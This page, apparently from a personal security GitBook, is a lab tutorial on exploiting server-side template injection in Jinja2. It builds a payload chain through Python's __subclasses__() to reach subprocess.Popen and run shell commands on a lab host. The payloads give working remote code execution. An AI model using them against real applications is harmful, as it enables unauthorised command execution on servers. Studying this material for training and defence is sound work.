Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security
  2. SSTI

Exploitation

So now we know the following !

  • The application is vulnerable to SSTI

  • The injection point

  • The template engine

  • The template engine syntax

Since Jinja2 is a Python based template engine, we will look at ways to run shell commands in Python.

http://10.10.39.6:5000/profile/<div data-gb-custom-block data-tag="import"></div>{{ os.system("whoami") }}

The above payload fails because jinja2 is essentially a sub language of Python that doesn't integrate the import statement in the code block.

Python allows us to call the current class instance with .__class__, we can call this on an empty string and Classes in Python have an attribute called .__mro__ that helps us to climb the inherited object tree, Since we want the root object, we can access the second property .__mro__[1]

Objects in Python have a method called .__subclasses()__ that allows us to climb down the object tree

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()}}

Everythings SET ! - Now we just have to find an object that allows us to run shell commands !

If we look closely the output displayed is just a Python list, so we can access this by using its index

We can find the Subprocess.Popen class in the dump and we can access it by using it's index, which is 401 in this case, so now our payload would look something like this

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401]}}

The above payload essentially calls the Subprocess.Popen method, now all we have to do is invoke it

http://10.10.39.6:5000/profile/{{''.__class__.__mro__[1].__subclasses__()[401] ("whoami", shell=True, stdout=-1).communicate() }}
PreviousIndentificationNextXXE Attacks

Last updated 2 years ago